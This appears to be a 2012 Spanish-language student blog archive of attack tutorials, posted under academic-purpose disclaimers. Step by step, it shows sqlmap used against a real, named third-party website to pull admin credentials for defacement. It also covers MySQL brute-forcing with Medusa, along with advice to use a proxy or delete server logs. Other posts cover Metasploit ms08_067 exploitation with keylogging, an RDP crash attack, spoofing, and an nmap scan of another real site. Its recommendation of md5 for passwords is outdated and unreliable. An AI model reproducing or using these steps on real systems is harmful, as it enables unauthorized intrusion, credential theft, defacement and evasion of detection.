Archive for septiembre, 2012


DEFACING WEB

DEFACING WEB

ACLARACION:

  El siguiente ataque tiene fines académicos no nos responsabilizamos el uso que se de a esta información nuestro propósito es dar a conocer nuestra técnica para que usted se proteja de ataques similares.

Imagen

INTRODUCCION:

El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.

La mayoría de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.
También por passwords débiles, problemas en el FTP, etc.

Imagen

OBJETIVOS:

Existen varios objetivos, dependiendo de quien venga el ataque, una de ellas es hacer una  injeccion de código afectando la sintaxis para lograr sentencias,  luego  infiltrarnos  al servidor para tener un mejor control sobre la web o hasta aplicando ingeniera social y hacer algo de pishing y obtener datos importantes .Pero nuestro objetivo es que puedan  probarlo en sus páginas web, para que se den cuenta si tienen vulnerabilidades y así poder corregirlas.

DIAGRAMA:

Imagen

ALCANCE:

Vamos a utilizar redes LAN, WAN, HERRAMIENTAS (BACKTRACK).

Imagen

GLOSARIO:

Testear: Examinar, verificar, controlar

Shell: un shell es una pieza de software que provee una interfaz para usuarios

Defacing: Aletración o cambio  producido de manera intencionada en una página web por un atacante.

BackTrack:  Relacionada con la seguridad informática en general

Hackear: Acción de irrumpir o entrar de manera forzada a un sistema de cómputo o a una red

SQL injection:  Técnica utilizada con el fin de alterar o atacar un sitio o servidor a través de comandos SQL.

Uploader =subir archivos.

Imagen

RECOMENDACIONES:

Garantizar que las contraseñas de acceso al sistema en línea sean almacenadas en forma encriptada en la base de datos, usando funciones tales como md5.  De esta manera, un atacante que ejecute una inyección SQL contra la base de datos no podrá ver en texto plano las contraseñas almacenadas.

Deshabilitar cualquier script o porción del código que permita la carga de archivos insegura desde la web a su sistema de archivos o su base de datos.

Estas funciones son utilizadas por los atacantes remotos para cargar contenidos del deface al sitio (funciones fopen, include, require, por ejemplo), por lo que deberá asegurarse que no estén disponibles entre los scripts del sitio.

Cambiar los permisos del directorio del sitio a solo lectura, para evitar que los atacantes puedan subir archivos a su carpeta visible por web.

Imagen

CONCLUSIONES:

Lo que hay detrás de un deface es mas que reemplazar un index y requiere dedicación para aplicar una verdadera acción tanto para el que realizo el deface para aprender mas en seguridad de programación como para el administrador del sitio que fue defaceado para el mismo propósito pero con diferente aplicación. Defenderse de esas vulnerabilidades.

TUTORIAL.-

Hoy  enseñaremos como hacer un defacing en un sitio web con sqlmap.py en BackTrack 5 r2, Sqlmap es una herramienta automática de inyección SQL que te ayuda a hackear sitio web fácilmente.  Vamos a empezar:

  1. Abra el terminal .

Imagen

2.- Vamos a ejecutar el siguiente comando  cd / pentest / database / sqlmap

Ahora sqlmap está abierto en su terminal

Imagen

3.- Sqlmap esta programado en python así que es multiplataforma, solo necesitas tener instalado el interprete de python. Solo hay que descomprimir el archivo, dentro encontrarás un script llamado “sqlmap.py”.

Lo hacemos de la siguiente manera.

python sqlmap.py

Imagen

 

4.- Ahora vamos a buscar una web vulnerable.

Encontrar una web vulnerable, Nos dirigimos a la pagina de Google y en el buscador colocamos esto id = cat index.php?. Bastante sencillo, tan solo colocar una ‘ (Comillas, coma, punto, cualquier caracter) al final de la variable es decir /index.php?id=28′ nos deberá marcar un error más o menos así (Puede variar los errores, pero el más común entre ellos es este):

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Bueno yo ya tengo la mia, la cual es la siguiente: http://www.aga-grinbo.com/  la revisamos hasta que en el URL nos apare algo como esto http://www.aga-grinbo.com/news_detail.php?id=45.

 Imagen

5.- Luego la concatenamos con python sqlmap.py –u.

-u          ===> señala el nuestro objetivo.

–dbs Para listar el nombre todas las bases de datos. Ej:

Nos quedaría lo siguiente:  python sqlmap.py –u http://www.aga-grinbo.com/news_detail.php?id=45 –dbs

 

 Imagen

6.- Ahora nos vamos a google y buscamos PAGE ADMIN

Imagen

7.- Encontramos una luego copiaremos el Url de nuestra pagina vulnerable.

Imagen

8.- Regresamos al Backtrack y vemos que comienza a testear la pagina

Imagen

9.- Agregamos al URL nuestra pagina vulnerable la palabra: /ADMIN.

Imagen

10.- Hemos vulnerado la pagina y nos pregunta si queremos seguir probando PARAMETROS  a los cual respondemos YES.

Imagen

11.- Ahora vamos a pedir el numero de tablas que tiene la base de datos que hemos encontrado la cual es: usr_web14_1.

-D               ====> señalamos el nombre de la base de datos.

–tables       ====> pedimos el número de tablas.
Nos quedaría asi:

python sqlmap.py –u http://www.aga-grinbo.com/news_detail.php?id=45 –D usr_web14_1  –table

Imagen

Imagen

12.- Ahora vamos a pedir que nos muestre las columnas de la tabla admind_detail

-T              ===> señalamos el nombre de la tabla.
–columns ===> pedimos el numero de columnas.

python sqlmap.py –d http://www.aga-grinbo.com/news_detail.php?id=45 –D usr_web14_1  -T  admin_details –columns

 Imagen

13.- Ahora vamos a pedir que nos muestre la data de las columna admin_name.

-C               ===> señalamos el nombre de la columna.
–dump       ===> pedimos la que nos muestre la data de la columna.

python sqlmap.py –u http://www.aga-grinbo.com/news_detail.php?id=45 –D usr_web14_1  -T  admin_name –dump

Imagen

Imagen

14.- Hemos notado el signo > y digitamos 1

Imagen

15.- Como verán encontramos el User Name:  admin@admin.com

Repetimos el mismo paso para  encontrar el PASSWORD

python sqlmap.py –u http://www.aga-grinbo.com/news_detail.php?id=45 –D usr_web14_1  -T  admin_password  –dump

Imagen

16.- Bingo hemos encontrado el PASSWORD:  admin

Imagen

Ok.  Ya estoy dentro de la administración de la pagina, pero tengan en cuenta que cada pagina web es diferente, cada una de ellas a veces solamente permiten modificar ciertas cosas o partes y hay algunas que tienen un uploader y otras no.

Es aquí donde empezamos nuestro deface ya sea modificando, cambiando el index etc…

Recuerden que este tutorial fue hecho con el fin de saber cuando nuestra página web es vulnerable y poder evitar que alguien mal intencionado modifique nuestra página web, puesto que a nadie nos gustaría aquello.

Nota: hemos elegido un buen tutorial de la web con el cual hemos comprobado que en realidad funciona y hemos tratado de entrar más en detalles.

VIDEO

SEGURIDAD INFORMATICA

S7J

GRUPO#12

•RONALD MAZINI

•MARJORIE TIGRERO

•LUIS MORALES  twitter@luisms7j

•KAREN ESPINOZA

•LADY TOBAR

ATAQUE FUERZA BRUTA A MYSQL

Imagen

ACLARACIÓN:

 El siguiente ataque tiene únicamente fines didácticos, no nos hacemos responsables por la visualización, gestión o manipulación del material presentado en esta web o de su uso

INTRODUCCIÓN:

 El ataque de fuerza bruta, es el procedimiento de cracking utilizado para obtener las claves o códigos necesarios para acceder a un equipo, sistema, sitio web, etc. consistente en utilizar bien combinaciones aleatorias bien listados de palabras, así como el método de prueba y error, hasta alcanzar una combinación correcta. Para obtenerlos se hace uso de diccionarios de palabras. 

OBJETIVO:

 El objetivo de este tipo de ataques es de obtener acceso a la maquina víctima o programa por medio de su propio user y password, por este ataque podemos acceder y obtener password de algunos servicio.

En el artículo vamos a demostrar paso a paso como funciona este ataque de FUERZA BRUTA y al servicio al que vamos a realizar el ataque es al de Mysql, además al final se presentara un vídeo por el cual pondremos en práctica todo lo explicado anteriormente.

LO QUE USAREMOS PARA EL ATAQUE:

  • Maquina virtual con Backtrack sera el Atacante
    • Herramienta de Backtrack a usar será Medusa
    • Escaneo de Puerto
    • Diccionario de Datos
  • Maquina virtual con Windows Xp (o el de su preferencia) Victima
    • Instalar Mysql

QUE ES MEDUSA:

 HERRAMIENTAS QUE TIENE INCORPORADO BACKTRACK PARA REALIZAR ATAQUES DE FUERZA BRUTA EXPLOTANDO VULNERABILIDADES DE PUERTOS ABIERTOS. 

Como utilizar eficientemente Medusa 

Antes de utilizar Medusa tenemos que estar claro en muchas cosas las cuales nos puede ahorrar mucho el trabajo, hacerlo mas cómodo o de forma eficiente, una de ella es aprendernos los parámetros o las opciones que la herramienta nos da.

Antes que todo revisar los servicios o módulos disponibles que nos presenta Medusa, debido a que cada actualización pudiese tener consigo nuevos servicios, para listar dichos módulos usamos la consola y tecleamos.

 Medusa -d

 Las opciones más interesantes para lanzar un ataque de fuerza bruta son:

 [-h host|-H file]: Mediante -h especificamos un determinado host, mientras que con -H indicamos un fichero dónde encontrar un listado de hosts a atacar.

 [-u username|-U file]: Mediante -u indicamos un usuario, mientras que con -U indicamos un diccionario con usuarios.

 [-p password|-P file]: Mediante -p indicamos una contraseña a probar o ubicación del diccionario, mientras que con -P indicamos un diccionario de contraseñas.

 -M module: Con -M indicamos un módulo de los disponibles para el protocolo o servicio que nos interese.

 -f: Detiene el Ataque en el Instante de encontrar un Password Valido

 -b: Suprime los Banners

COMO FUNCIONARA EL ATAQUE:

  1. Levantar la herramienta medusa
  2. Hacer un escaneo del puerto para verificar que nuestro ataque tenga éxito, en nuestro caso tiene que estar activo el puerto de Mysql que es el 3306
  3. Por último lo que haremos es enviar el ataque de fuerza bruta y obtendremos los resultados en este caso user y password del Mysql

EL ATAQUE:

1.- ABRIREMOS NUESTRA MAQUINA XP(VICTIMA) Y LE HAREMOS UN IPCONFIG PARA SABER SU IP

Imagen

2.-ABRIREMOS MYSQL Y ENTRAREMOS CON EL USER Y PASSWORD DEFINIDOS PARA ESTE CASO EL CUAL SERA user=root y password=abc123

Imagen

 3.-USAREMOS BACKTRACK, COMO YA SABEMOS LA IP DE LA MAQUINA VICTIMA, ABRIREMOS UN TERMINAL Y PROCEDEREMOS HACERLE UN PING A LA MAQUINA VICTIMA PARA SABER QUE ESTAMOS EN LINEA CON ELLA.

Imagen

4.-BUENO YA SABEMOS QUE HAY RESPUESTA DE LA MAQUINA VICTIMA, AHORA SI EMPEZAREMOS. LEVANTAMOS EL SERVICIO DE MEDUSA HERRAMIENTA QUE BACKTRACK TIENE INCORPORADO PARA REALIZAR ATAQUES DE FUERZA BRUTA, USAREMOS EL COMANDO sudo apt-get install medusa

Imagen

5.-UNA VEZ LEVANTADO EL SERVICIO DE MEDUSA PODEMOS VER LOS MÓDULOS QUE TIENE MEDUSA, COMO LO HACEMOS TIPEANDO EL COMANDO medusa –d

Imagen

6.-LUEGO DE ESO REALIZAREMOS UN MAPEO ALA MAQUINA VICTIMA PARA VERIFICAR QUE TENGA ABIERTO EL PUERTO QUE VAMOS ATACAR, EN ESTE CASO VAMOS ATACAR AL PUERTO 3306 QUE ES EL DE MYSQL LO HAREMOS CON EL COMANDO NMAP SEGUIDO POR LA IP VICTIMA. nmap 192.168.0.111

Imagen

7.-UNA VEZ QUE CONFIRMAMOS QUE EL PUERTO ESTA ABIERTO LANZAMOS EL ATAQUE ANTES DE ESO VERIFICAR QUE TENGAMOS NUESTRO DICCIONARIO DE DATOS O USAR EL QUE TIENE BACKTRACK POR DEFECTO YOU USARE 500-Worst-passwords.txt USTEDES PUEDEN USAR EL QUE MAS LES GUSTE (DEPENDIENDO DE QUE EXTENSO SEA SU DICCIONARIO SERA MUCHO MEJOR EL RESULTADO). USAREMOS EL COMANDO

Medusa –h 192.168.0.111 –u root –P /root/Desktop/500-Worst-passwords.txt –M Mysql –f –b 

Imagen

8.-DESPUÉS DE EVALUAR PASSWORD POR PASSWORD HASTA QUE DE CON LA QUE COINCIDA MOSTRARA UN MENSAJE QUE DICE:

ACCOUNT FOUND: [mysql] Host: 192.168.0.111 User: root Password: abc123 [SUCCESS]

Imagen

Algunas Observaciones

Existen algunos inconvenientes que debemos tener en cuenta antes de realizar un ataque de este tipo:

  • No  hay total certeza de encontrar el password, sin embargo la efectividad de un ataque con diccionario es directamente proporcional al tamaño del diccionario, es decir, entre más grande sea el diccionario mayor sera la probabilidad de  encontrar la contraseña.
  • Algunos sysadmin inteligentes restringen  el número de intentos de autenticacion a un número no mayor a 3, así que si nos topamos con un servidor serio, no podremos aplicar el ataque por fuerza bruta.
  • Cuando nos encontramos un servidor “vulnerable” a un ataque de fuerza bruta con diccionario, debemos tener muchísimo cuidado, ya que un ataque de esta naturaleza  hace demasiado “RUIDO” es decir, todos los intentos de conexión quedaran guardados en los logs del servidor, por eso es pertinente usar un proxy para hacer el ataque, o  en su defecto borrar los logs, inmediatamente después de entrar al server

INTEGRANTES:

GABRIEL HUAYAMABE                  Twitter @Gabrielhuayamab

HENRY VALLE                                  Twitter @henryvallev

MARÍA DEL CARMEN LOAIZA      Twitter  @MaritaLoaiza

MIRASOL OLAYA

POR ULTIMO PRESENTAMOS EL VÍDEO DE NUESTRO ATAQUE GRACIAS POR SU ATENCIÓN 

http://www.youtube.com/watch?v=gL7EQuQbnG4


Exploit

ACLARACIÓN:
El siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le dé a esta información. Nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

INTRODUCCIÓN:
Este ataque consiste en explotar las vulnerabilidades de los diferente sistemas operativos y programas o software contenidos en él, y mediante estas obtener privilegios o el control total del equipo o PC víctima.

OBJETIVOS:
Detectar las falencias y vulnerabilidades de los equipos mediante el uso de la herramienta METASPLOIT que se encuentra contenida en la distribución de Linux “Back trac 5 R2”

ALCANCE:
Este ataque se lo puede llevar a cabo a nivel de una red local LAN.

DIAGRAMA DEL ATAQUE:


GLOSARIO DE TÉRMINOS:

Metasploit:

Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos. También denominado MSF (Metasploit Framework).

Meterpreter:
El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Payloads:

Esta es una de las cosas mas importantes, es la accion que se va a realizar si se logra explotar la vulnerabilidad que seleccionamos

Exploits:

Aquí encontramos todos los exploits disponibles en MSF y que podemos utilizar. Estandividos por SO’s y categoriras. Ejemplo: exploits/windows/browser/ y aquí econtrariamos los exploits disponibles para los navegadores que corren en el SO windows.

¿Qué es una vulnerabilidad?
Una vulnerabilidad es un agujero de seguridad en una pieza del sistema de software, hardware o de funcionamiento que proporciona un ángulo potencial para atacar el sistema. Una vulnerabilidad puede ser tan simple como contraseñas débiles o tan complejo como desbordamientos de búfer o vulnerabilidades de inyección SQL.

TUTORIAL:

IP Victima

Ports Equipo Victima

Conexión IP Equipo Atacante

Ip Equipo Atacante

Conexión IP Equipo Victima

Ports IP Equipo Victima

Realizamos el escaneo de puertos disponibles en el equipo victima para identificar la puerta (port available) para efectuar la intrusión. Utilizamos el comando nmap para efectuar la operación.

Metasploit

Una vez identificados los puertos disponibles realizamos el proceso de detección mediante el comando msfconsole, desde el prompt de BackTrack 5.

Ataque Equipo Victima

Afectando Vulnerabibildad PORT 445

ATAQUE SCREENSHOT

Utilizamos el siguiente comando use exploit/windows/smb/ms08_067_netapi el cual se utiliza para tener acceso y controlar según se desee.

Seteamos los valores antes de ejecutar el ataque (exploit)

1.- set LHOST 192.168.15.128 (IP Equipo Atacante)

2.- set RHOST 192.168.15.129 (IP Equipo Víctima)

3.- exploit (Efectuar el ataque)

4.- meterpreter > (Prompt que indica que estamos listos para efectuar cualquier tipo de acción en el equipo Victima)

 

Mostramos los procesos de la victima con el comando ps.

Capturamos el proceso explorer, cual obtenemos su PID, (process id). En este caso es el 1704.

Digitamos migrate 1704 el cual capturamos el contexto del usuario para obtener los privilegios.

Realizamos la captura de la pantalla remota mediante el comando screenshot.

Captura del Windows XP

ATAQUE KEYLOGGER

Este ataque consiste en capturar las teclas que ha pulsado la victima. Usaremos el comando keyscan_start

Digitamos una entrada de teclado en la pc vitima

Luego en la pc atacante con el comando keyscan_dump observamos lo que ha digitado la victima.

ATAQUE DE ESCRITORIO REMOTO

Este ataque consiste en reiniciar la pc victima con el típico pantallazo azul, mediante una vulnerabilidad detectada en el puerto 3389 del protocolo de escritorio remoto en los sistemas operativos windows. Utilizamos la siguiente instrucción use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 

Posterior a eso debemos especificar la ip Victima mediante set RHOST 192.168.15.129

Y ejecutamos la acción con el comando run efectuamos el ataque obteniendo el típico pantallazo azul común desde windows 3.1.  😦

 

 

 

 

Video:

http://www.youtube.com/watch?v=kJtt8oNdEyw&feature=youtu.be

CONCLUSIONES.

Se observa lo sencillo que puede ser caer un sistema, software y lo fácil que es configurar Metasploit para realizar diversos ataques en el equipo victima con conocimientos básicos.

RECOMENDACIONES.

Siempre es importante tener actualizado su sistema operativo, aplicaciones, etc para no ser victima de este tipo de ataques, vulnerabilidades. Se recomienda el buen uso de aplicaciones de control como antivirus, firewalls, actualizaciones periódicas.

INTEGRANTES:

Carlos Quiñonez          @carlosqsar

Fabricio Pinargote      @FabrizzioAP

Henry Quiñonez          @henqui71

Jose Hidalgo               @jghf1983

Rosa Espinoza            @rosaespinozab

Aclaración.

El siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le de a esta información, nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

Introducción.
Spoofing, en términos de seguridad de redes hace referencia al uso de técnicas de suplantación de identidad generalmente con usos maliciosos o de investigación.
Existen varios tipos de spoofing vamos a dar a conocer dos de ellos como son el ARP Spoofing y el DNS Spoofing.
El ARP Spoofing es la suplantación de identidad por falsificación de la tabla ARP. Se trata de la construcción de tramas de solicitud y respuesta ARP modificadas con el objetivo de falsear la tabla ARP (relación IP-MAC) de una víctima y forzarla a que envíe los paquetes a un host atacante en lugar de hacerlo a su destino legítimo.
DNS Spoofing es la suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación «Nombre de dominio-IP» ante una consulta de resolución de nombre, es decir, resolver con una dirección IP falsa un cierto nombre DNS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el caché DNS de otro servidor diferente.

Objetivo.
El objetivo de estos ataques es obtener credenciales de usuarios, estos pueden tener fines maliciosos o investigativo. Por eso damos a conocer esta información para que los usuarios tengan cuidado desde donde inician sesión sus cuentas.

DIAGRAMA DE ATAQUES.

ARP SPOOFING.

DNS SPOOFING.

Alcance.

Este ataque se lo puede realizar con equipos dentro de una misma red LAN.

Videos Tutoriales.

ARP SPOOFING

DNS SPOOFING

Integrantes.

Joel Alvarado Torres          @joel_isaias
Iliana Holguin Sellan         @ilianaholguin
Arturo Zamora Abad          @zamora_arturo90
Omar Velez Nuñez             @omar_emelexista
Freddy Mora Miranda         @maximi88

Ataque de Enumeración de sitios web.

Introducción

Los diferentes acontecimientos de ataques de hackers en el campo de la informática desde su inicio hasta la actualidad y como estudiantes de Sistemas, es nuestro deber dar conocer una de las tantas técnicas que se utiliza para vulnerar la seguridad el sistema.

El ataque  de Enumeración a Sitios Web, es una técnica que tiene como objetivo obtener información sensible como:

–   Puertos Abiertos.

–   Servicios que están corriendo en un determinado puerto.

–   Sistemas operativos.

–   Recursos.

–   Servicio de red.

Siendo unas de las primeras fases utilizadas para los distintos ataque.

 

Objetivo

Es conocer vulnerabilidad por medio de un escaneo a sus puertos y los servicios que están corriendo, además  el sistema operativo y recursos que utiliza, servicio de red,  con toda esta información podemos conocer cuál es la mejor técnica y herramienta a utilizar para hackear el sistema que se encuentra desprotegido.       

Aclaración

El siguiente ataque tiene fines académicos, no nos responsabilizamos por el uso que se le dé a esta información, nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

Diagrama

Imagen

Herramientas

  • Nmap(para consola)
  • Zenmap(ambiente grafico) -> Esta utilizamos.

 

Alcance

Como es una técnica de penetración se puede escanear redes internas como externas, ya sea LAN, MAN, WAN

Glosario

NMAP(Network Mapper): es el programa por consola que nos permite escanear por medio de una Ip y a través de unos comandos, información  que hace posible vulnerable este sitio.

ZENMAP: es el programa por medio de una interfaz grafica que nos permite escanear por medio de una ip y a través de unos comandos, información que hace posible vulnerable este sitio, esta herramienta es más sencilla de manejar.

Tutorial

1.- Lo primero que hacemos es abrir la herramienta zenmap la cual no permitirá escanear por medio de una IP toda la información necesaria.

Imagen

2.-Si no se conoce la IP, se puede poner el nombre de la pagina en la pantalla de cmd y con el comando ping nos mostrara el número de ip que usa.

 Imagen

3.- Para este ejemplo tomamos la pagina Web www.renuevodeplenitud.com la cual tiene con Ip(108.162.204.52)

 Imagen 

4.-Procedemos a introducir el número Ip(108.162.204.52) al programa zenmap.

 Imagen

5.- Después que introducimos la Ip  acto seguido se debe pulsar el botón que tiene  como nombre  “SCAN” el cual va encender  el escaneo de  la aplicación.

 Imagen

6.-Como se puede apreciar en la grafica muestra el avance del escaneo.

 Imagen

7.- En este paso ya podemos ver el número  de los diferentes puertos que están abierto, y que son lo que estamos buscando.

Imagen

8.- Aquí se muestra en detalle los puertos abierto y los servicios que están usando esta IP.

Imagen

9.- La aplicación escanea  toda la información de la ip, que nos va servir y por medio  

Imagen

10.- Una vez escaneado toda la información podemos pasar a las diferentes pestañas que  del menú, esta imagen nos indica la trayectoria que hizo.

 Imagen

11.- Esta pestaña nos muestra el sistemas  operativo que esta trabajando  en el sistema.

ImagenImagen

 

12.- En esta ventana se aprecia la pestaña que indica el comando y los parámetros del escaneo para la Ip indicada.

 ImagenImagen

 

Recomendación y Conclusión

Muchos de estos ataques de  Enumeración de sitios web  se basan en el escaneo de puertos abiertos por ende los servicios que tiene como puerta de entrada los puertos que intervienen en el sistema que maneja la PC.  

Se deben tener bloqueados el 99% de puertos de una pc, para  evitar la vulnerabilidad del sistema.

Integrantes

1.- Washington Carrillo   @WashingtonCarr3

2.- Gustavo Espinoza

3.- Víctor Vivas